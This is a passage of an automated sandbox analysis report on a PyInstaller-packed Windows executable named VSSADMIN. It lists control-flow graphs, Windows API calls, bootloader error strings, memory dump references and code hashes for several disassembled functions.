                                                                                                                                                                      control_flow_graph 53 7ff614c71440-7ff614c71457 call 7ff614c76740 56 7ff614c71459-7ff614c71461 53->56 57 7ff614c71462-7ff614c71485 call 7ff614c76a60 53->57 60 7ff614c714a7-7ff614c714ad 57->60 61 7ff614c71487-7ff614c714a2 call 7ff614c724d0 57->61 62 7ff614c714e0-7ff614c714f4 call 7ff614c7f964 60->62 63 7ff614c714af-7ff614c714ba call 7ff614c73cd0 60->63 70 7ff614c71635-7ff614c71647 61->70 72 7ff614c71516-7ff614c7151a 62->72 73 7ff614c714f6-7ff614c71511 call 7ff614c724d0 62->73 68 7ff614c714bf-7ff614c714c5 63->68 68->62 71 7ff614c714c7-7ff614c714db call 7ff614c72770 68->71 83 7ff614c71617-7ff614c7161d 71->83 76 7ff614c7151c-7ff614c71528 call 7ff614c71050 72->76 77 7ff614c71534-7ff614c71554 call 7ff614c840e0 72->77 73->83 84 7ff614c7152d-7ff614c7152f 76->84 85 7ff614c71556-7ff614c71570 call 7ff614c724d0 77->85 86 7ff614c71575-7ff614c7157b 77->86 87 7ff614c7162b-7ff614c7162e call 7ff614c7f2dc 83->87 88 7ff614c7161f call 7ff614c7f2dc 83->88 84->83 99 7ff614c7160d-7ff614c71612 85->99 90 7ff614c71605-7ff614c71608 call 7ff614c840cc 86->90 91 7ff614c71581-7ff614c71586 86->91 98 7ff614c71633 87->98 97 7ff614c71624 88->97 90->99 96 7ff614c71590-7ff614c715b2 call 7ff614c7f62c 91->96 102 7ff614c715b4-7ff614c715cc call 7ff614c7fd6c 96->102 103 7ff614c715e5-7ff614c715ec 96->103 97->87 98->70 99->83 109 7ff614c715d5-7ff614c715e3 102->109 110 7ff614c715ce-7ff614c715d1 102->110 104 7ff614c715f3-7ff614c715fb call 7ff614c724d0 103->104 111 7ff614c71600 104->111 109->104 110->96 112 7ff614c715d3 110->112 111->90 112->111
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc
                                                                                                                                                                      • API String ID: 0-666925554
                                                                                                                                                                      • Opcode ID: 1a5f48eb8e6aeba63a7b107ec5cbd23da28d659e00bdd0f0ebeaed79e5a7b8c4
                                                                                                                                                                      • Instruction ID: 002627bfc82ce9889b8d8cd2fb871a574f5cee74e2ef7071d5e6b6c9794b3c83
                                                                                                                                                                      • Opcode Fuzzy Hash: 1a5f48eb8e6aeba63a7b107ec5cbd23da28d659e00bdd0f0ebeaed79e5a7b8c4
                                                                                                                                                                      • Instruction Fuzzy Hash: FC51AC61B0CE8292EA109B15E4D56B963B2AF86FF9F444133DE0D87796EE3EE5458300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C778D0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 91COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetCurrentProcess.KERNEL32(00000000,00007FF614C7687A,?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77910
                                                                                                                                                                      • OpenProcessToken.ADVAPI32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77921
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77943
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C7794D
                                                                                                                                                                      • GetTokenInformation.KERNELBASE(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C7798A
                                                                                                                                                                      • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF614C7799C
                                                                                                                                                                      • CloseHandle.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C779B4
                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C779E6
                                                                                                                                                                      • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF614C77A0D
                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(?,?,00000000,?,?,00007FF614C7676D), ref: 00007FF614C77A1E
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                      • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                      • API String ID: 4998090-2855260032
                                                                                                                                                                      • Opcode ID: 8a88fb3c2216515b484f0d8182ac8353e0a7e80e230e5fdba7f3caac5ffba242
                                                                                                                                                                      • Instruction ID: d6865ce8e8da8e6b9fc4ba81797bd2e0a7ba25aab07dd6370f01fbdfa9e29f00
                                                                                                                                                                      • Opcode Fuzzy Hash: 8a88fb3c2216515b484f0d8182ac8353e0a7e80e230e5fdba7f3caac5ffba242
                                                                                                                                                                      • Instruction Fuzzy Hash: CF41AF3161DE8692EB109F64E4846AA7371FB86BB5F401232EA9E876D5DF3DE404C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C77000 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 90processsynchronizationCOMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                      • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                      • API String ID: 2895956056-3524285272
                                                                                                                                                                      • Opcode ID: 70482ae767ba9e09b517fd1531fb7070f55263243fe81ec667caeea18f8722ee
                                                                                                                                                                      • Instruction ID: d17c6e390d7880e1e4280f2270b8cece3af06fd1a86c0da9f8a39eadcb78234b
                                                                                                                                                                      • Opcode Fuzzy Hash: 70482ae767ba9e09b517fd1531fb7070f55263243fe81ec667caeea18f8722ee
                                                                                                                                                                      • Instruction Fuzzy Hash: C7411232A0CB8292DA209B64F4952AAB3B4FB96774F500336E6AD877D5DF7CD0448B40
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C71000 Relevance: 12.5, APIs: 1, Strings: 6, Instructions: 273COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 383 7ff614c71000-7ff614c736a6 call 7ff614c7f0b0 call 7ff614c7f0a8 call 7ff614c77630 call 7ff614c7f0a8 call 7ff614c7ade0 call 7ff614c842a0 call 7ff614c84f44 call 7ff614c71af0 401 7ff614c736ac-7ff614c736bb call 7ff614c73bc0 383->401 402 7ff614c737ba 383->402 401->402 407 7ff614c736c1-7ff614c736d4 call 7ff614c73a90 401->407 404 7ff614c737bf-7ff614c737df call 7ff614c7adb0 402->404 407->402 411 7ff614c736da-7ff614c736ed call 7ff614c73b40 407->411 411->402 414 7ff614c736f3-7ff614c7371a call 7ff614c769b0 411->414 417 7ff614c7375c-7ff614c73784 call 7ff614c76fc0 call 7ff614c719d0 414->417 418 7ff614c7371c-7ff614c7372b call 7ff614c769b0 414->418 428 7ff614c7386d-7ff614c7387e 417->428 429 7ff614c7378a-7ff614c737a0 call 7ff614c719d0 417->429 418->417 423 7ff614c7372d-7ff614c73733 418->423 426 7ff614c73735-7ff614c7373d 423->426 427 7ff614c7373f-7ff614c73759 call 7ff614c840cc call 7ff614c76fc0 423->427 426->427 427->417 433 7ff614c73893-7ff614c738ab call 7ff614c77a60 428->433 434 7ff614c73880-7ff614c7388a call 7ff614c732a0 428->434 440 7ff614c737a2-7ff614c737b5 call 7ff614c72770 429->440 441 7ff614c737e0-7ff614c737e3 429->441 444 7ff614c738ad-7ff614c738b9 call 7ff614c72770 433->444 445 7ff614c738be-7ff614c738c5 SetDllDirectoryW 433->445 448 7ff614c7388c 434->448 449 7ff614c738cb-7ff614c738d8 call 7ff614c75e60 434->449 440->402 441->428 447 7ff614c737e9-7ff614c73800 call 7ff614c73cd0 441->447 444->402 445->449 458 7ff614c73807-7ff614c73833 call 7ff614c77230 447->458 459 7ff614c73802-7ff614c73805 447->459 448->433 456 7ff614c738da-7ff614c738ea call 7ff614c75b00 449->456 457 7ff614c73926-7ff614c7392b call 7ff614c75de0 449->457 456->457 473 7ff614c738ec-7ff614c738fb call 7ff614c75660 456->473 466 7ff614c73930-7ff614c73933 457->466 468 7ff614c7385d-7ff614c7386b 458->468 469 7ff614c73835-7ff614c7383d call 7ff614c7f2dc 458->469 463 7ff614c73842-7ff614c73858 call 7ff614c72770 459->463 463->402 471 7ff614c73939-7ff614c73946 466->471 472 7ff614c739e6-7ff614c739f5 call 7ff614c73130 466->472 468->434 469->463 475 7ff614c73950-7ff614c7395a 471->475 472->402 483 7ff614c739fb-7ff614c73a32 call 7ff614c76f50 call 7ff614c769b0 call 7ff614c753f0 472->483 486 7ff614c7391c-7ff614c73921 call 7ff614c758b0 473->486 487 7ff614c738fd-7ff614c73909 call 7ff614c755e0 473->487 479 7ff614c7395c-7ff614c73961 475->479 480 7ff614c73963-7ff614c73965 475->480 479->475 479->480 484 7ff614c73967-7ff614c7398a call 7ff614c71b30 480->484 485 7ff614c739b1-7ff614c739e1 call 7ff614c73290 call 7ff614c730d0 call 7ff614c73280 call 7ff614c758b0 call 7ff614c75de0 480->485 483->402 510 7ff614c73a38-7ff614c73a6d call 7ff614c73290 call 7ff614c77000 call 7ff614c758b0 call 7ff614c75de0 483->510 484->402 497 7ff614c73990-7ff614c7399b 484->497 485->404 486->457 487->486 498 7ff614c7390b-7ff614c7391a call 7ff614c75cb0 487->498 501 7ff614c739a0-7ff614c739af 497->501 498->466 501->485 501->501 523 7ff614c73a77-7ff614c73a7a call 7ff614c71ab0 510->523 524 7ff614c73a6f-7ff614c73a72 call 7ff614c76cc0 510->524 527 7ff614c73a7f-7ff614c73a81 523->527 524->523 527->404
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00007FF614C73BC0: GetModuleFileNameW.KERNEL32(?,00007FF614C736B9), ref: 00007FF614C73BF1
                                                                                                                                                                      • SetDllDirectoryW.KERNEL32 ref: 00007FF614C738C5
                                                                                                                                                                        • Part of subcall function 00007FF614C769B0: GetEnvironmentVariableW.KERNEL32(00007FF614C73707), ref: 00007FF614C769EA
                                                                                                                                                                        • Part of subcall function 00007FF614C769B0: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF614C76A07
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                      • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                      • API String ID: 2344891160-3602715111
                                                                                                                                                                      • Opcode ID: e605fd0aad1ab472f48a568d7d0ee426e99d24addfca6fff91547fc3397323d3
                                                                                                                                                                      • Instruction ID: 9ec78fc48b73ec43f0d657773c76d560a36c888231572b90cab4fcc9a688604f
                                                                                                                                                                      • Opcode Fuzzy Hash: e605fd0aad1ab472f48a568d7d0ee426e99d24addfca6fff91547fc3397323d3
                                                                                                                                                                      • Instruction Fuzzy Hash: F0B18121A1CD8352EA64AB21D5D22BD23B1BF46FA6F444033EA4DC77A6EE2CE505C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C71050 Relevance: 12.4, APIs: 1, Strings: 6, Instructions: 156COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 528 7ff614c71050-7ff614c710ab call 7ff614c7a640 531 7ff614c710ad-7ff614c710d2 call 7ff614c72770 528->531 532 7ff614c710d3-7ff614c710eb call 7ff614c840e0 528->532 537 7ff614c710ed-7ff614c71104 call 7ff614c724d0 532->537 538 7ff614c71109-7ff614c71119 call 7ff614c840e0 532->538 545 7ff614c7126c-7ff614c71281 call 7ff614c7a320 call 7ff614c840cc * 2 537->545 543 7ff614c7111b-7ff614c71132 call 7ff614c724d0 538->543 544 7ff614c71137-7ff614c71147 538->544 543->545 547 7ff614c71150-7ff614c71175 call 7ff614c7f62c 544->547 561 7ff614c71286-7ff614c712a0 545->561 554 7ff614c7117b-7ff614c71185 call 7ff614c7f3a0 547->554 555 7ff614c7125e 547->555 554->555 562 7ff614c7118b-7ff614c71197 554->562 557 7ff614c71264 555->557 557->545 563 7ff614c711a0-7ff614c711c8 call 7ff614c78a90 562->563 566 7ff614c711ca-7ff614c711cd 563->566 567 7ff614c71241-7ff614c7125c call 7ff614c72770 563->567 568 7ff614c7123c 566->568 569 7ff614c711cf-7ff614c711d9 566->569 567->557 568->567 571 7ff614c711db-7ff614c711e8 call 7ff614c7fd6c 569->571 572 7ff614c71203-7ff614c71206 569->572 577 7ff614c711ed-7ff614c711f0 571->577 575 7ff614c71208-7ff614c71216 call 7ff614c7bb90 572->575 576 7ff614c71219-7ff614c7121e 572->576 575->576 576->563 579 7ff614c71220-7ff614c71223 576->579 580 7ff614c711f2-7ff614c711fc call 7ff614c7f3a0 577->580 581 7ff614c711fe-7ff614c71201 577->581 583 7ff614c71237-7ff614c7123a 579->583 584 7ff614c71225-7ff614c71228 579->584 580->576 580->581 581->567 583->557 584->567 585 7ff614c7122a-7ff614c71232 584->585 585->547
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Message
                                                                                                                                                                      • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                      • API String ID: 2030045667-1655038675
                                                                                                                                                                      • Opcode ID: b8fd690a5a2264474b6c5daba4af4280a6f19887d0f050df518d7380527136c0
                                                                                                                                                                      • Instruction ID: 5067d7a9787a24981a0425461bf047e5ed231096b45583fac2050321c02ac1f1
                                                                                                                                                                      • Opcode Fuzzy Hash: b8fd690a5a2264474b6c5daba4af4280a6f19887d0f050df518d7380527136c0
                                                                                                                                                                      • Instruction Fuzzy Hash: 6051A422A0DE8286EA209B55E4803BA62B2FB86FB5F544137DE4DC7795EF3CE545C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8DDE8 Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 117libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      APIs
                                                                                                                                                                      • FreeLibrary.KERNEL32(?,00000000,?,00007FF614C8E182,?,?,-00000018,00007FF614C8A253,?,?,?,00007FF614C8A14A,?,?,?,00007FF614C854A2), ref: 00007FF614C8DF64
                                                                                                                                                                      • GetProcAddress.KERNEL32(?,00000000,?,00007FF614C8E182,?,?,-00000018,00007FF614C8A253,?,?,?,00007FF614C8A14A,?,?,?,00007FF614C854A2), ref: 00007FF614C8DF70
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressFreeLibraryProc
                                                                                                                                                                      • String ID: api-ms-$ext-ms-
                                                                                                                                                                      • API String ID: 3013587201-537541572
                                                                                                                                                                      • Opcode ID: d8cc7062eaeb840b6a05769bf190717e46830e73a0557d63fb398ab5923ee7ee
                                                                                                                                                                      • Instruction ID: 9faa76ad0f9db54a2a93986ea945017a36405945ec8f955a11fa8faa09d66ba8
                                                                                                                                                                      • Opcode Fuzzy Hash: d8cc7062eaeb840b6a05769bf190717e46830e73a0557d63fb398ab5923ee7ee
                                                                                                                                                                      • Instruction Fuzzy Hash: C941E471B19E1392FA15CB16A8805B522B2BF46FB0F084137DD0EC7798EE3DE846A344
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8AF5C Relevance: 10.8, APIs: 7, Instructions: 290COMMONLIBRARYCODE
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 685 7ff614c8af5c-7ff614c8af82 686 7ff614c8af84-7ff614c8af98 call 7ff614c84454 call 7ff614c84474 685->686 687 7ff614c8af9d-7ff614c8afa1 685->687 704 7ff614c8b38e 686->704 689 7ff614c8b377-7ff614c8b383 call 7ff614c84454 call 7ff614c84474 687->689 690 7ff614c8afa7-7ff614c8afae 687->690 707 7ff614c8b389 call 7ff614c89de0 689->707 690->689 692 7ff614c8afb4-7ff614c8afe2 690->692 692->689 695 7ff614c8afe8-7ff614c8afef 692->695 698 7ff614c8aff1-7ff614c8b003 call 7ff614c84454 call 7ff614c84474 695->698 699 7ff614c8b008-7ff614c8b00b 695->699 698->707 702 7ff614c8b011-7ff614c8b017 699->702 703 7ff614c8b373-7ff614c8b375 699->703 702->703 709 7ff614c8b01d-7ff614c8b020 702->709 708 7ff614c8b391-7ff614c8b3a8 703->708 704->708 707->704 709->698 712 7ff614c8b022-7ff614c8b047 709->712 714 7ff614c8b049-7ff614c8b04b 712->714 715 7ff614c8b07a-7ff614c8b081 712->715 718 7ff614c8b072-7ff614c8b078 714->718 719 7ff614c8b04d-7ff614c8b054 714->719 716 7ff614c8b083-7ff614c8b0ab call 7ff614c8cafc call 7ff614c89e48 * 2 715->716 717 7ff614c8b056-7ff614c8b06d call 7ff614c84454 call 7ff614c84474 call 7ff614c89de0 715->717 748 7ff614c8b0c8-7ff614c8b0f3 call 7ff614c8b784 716->748 749 7ff614c8b0ad-7ff614c8b0c3 call 7ff614c84474 call 7ff614c84454 716->749 746 7ff614c8b200 717->746 720 7ff614c8b0f8-7ff614c8b10f 718->720 719->717 719->718 723 7ff614c8b111-7ff614c8b119 720->723 724 7ff614c8b18a-7ff614c8b194 call 7ff614c92a6c 720->724 723->724 727 7ff614c8b11b-7ff614c8b11d 723->727 737 7ff614c8b21e 724->737 738 7ff614c8b19a-7ff614c8b1af 724->738 727->724 731 7ff614c8b11f-7ff614c8b135 727->731 731->724 735 7ff614c8b137-7ff614c8b143 731->735 735->724 740 7ff614c8b145-7ff614c8b147 735->740 742 7ff614c8b223-7ff614c8b243 ReadFile 737->742 738->737 743 7ff614c8b1b1-7ff614c8b1c3 GetConsoleMode 738->743 740->724 747 7ff614c8b149-7ff614c8b161 740->747 750 7ff614c8b249-7ff614c8b251 742->750 751 7ff614c8b33d-7ff614c8b346 GetLastError 742->751 743->737 745 7ff614c8b1c5-7ff614c8b1cd 743->745 745->742 752 7ff614c8b1cf-7ff614c8b1f1 ReadConsoleW 745->752 755 7ff614c8b203-7ff614c8b20d call 7ff614c89e48 746->755 747->724 756 7ff614c8b163-7ff614c8b16f 747->756 748->720 749->746 750->751 758 7ff614c8b257 750->758 753 7ff614c8b363-7ff614c8b366 751->753 754 7ff614c8b348-7ff614c8b35e call 7ff614c84474 call 7ff614c84454 751->754 761 7ff614c8b212-7ff614c8b21c 752->761 762 7ff614c8b1f3 GetLastError 752->762 766 7ff614c8b1f9-7ff614c8b1fb call 7ff614c843e8 753->766 767 7ff614c8b36c-7ff614c8b36e 753->767 754->746 755->708 756->724 765 7ff614c8b171-7ff614c8b173 756->765 769 7ff614c8b25e-7ff614c8b273 758->769 761->769 762->766 765->724 773 7ff614c8b175-7ff614c8b185 765->773 766->746 767->755 769->755 775 7ff614c8b275-7ff614c8b280 769->775 773->724 776 7ff614c8b282-7ff614c8b29b call 7ff614c8ab74 775->776 777 7ff614c8b2a7-7ff614c8b2af 775->777 785 7ff614c8b2a0-7ff614c8b2a2 776->785 781 7ff614c8b2b1-7ff614c8b2c3 777->781 782 7ff614c8b32b-7ff614c8b338 call 7ff614c8a9b4 777->782 786 7ff614c8b31e-7ff614c8b326 781->786 787 7ff614c8b2c5 781->787 782->785 785->755 786->755 789 7ff614c8b2ca-7ff614c8b2d1 787->789 790 7ff614c8b2d3-7ff614c8b2d7 789->790 791 7ff614c8b30d-7ff614c8b318 789->791 792 7ff614c8b2f3 790->792 793 7ff614c8b2d9-7ff614c8b2e0 790->793 791->786 795 7ff614c8b2f9-7ff614c8b309 792->795 793->792 794 7ff614c8b2e2-7ff614c8b2e6 793->794 794->792 796 7ff614c8b2e8-7ff614c8b2f1 794->796 795->789 797 7ff614c8b30b 795->797 796->795 797->786
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000000.00000002.246803948.00007FF614C71000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF614C70000, based on PE: true
                                                                                                                                                                      • Associated: 00000000.00000002.246796360.00007FF614C70000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246812561.00007FF614C9A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CAD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246821105.00007FF614CBC000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      • Associated: 00000000.00000002.246836153.00007FF614CBE000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_0_2_7ff614c70000_VSSADMIN.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: _invalid_parameter_noinfo
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3215553584-0
                                                                                                                                                                      • Opcode ID: 5685d0f25caf721876973ab72b1472ebb2d945ece1dea6ed4e4a06a13e7fea7a
                                                                                                                                                                      • Instruction ID: b024cd018be5e20a4874668f1fac934165e01dcbf1ff94a235946bc27ce63cec
                                                                                                                                                                      • Opcode Fuzzy Hash: 5685d0f25caf721876973ab72b1472ebb2d945ece1dea6ed4e4a06a13e7fea7a
                                                                                                                                                                      • Instruction Fuzzy Hash: D8C1B23290CE8791EA609B15D4802BE6A70FB83FA0F554137EA5E87792EF7DE445D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FF614C8C460 Relevance: 6.2, APIs: 4, Instructions: 218COMMON
                                                                                                                                                                      Download Yara Rule

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
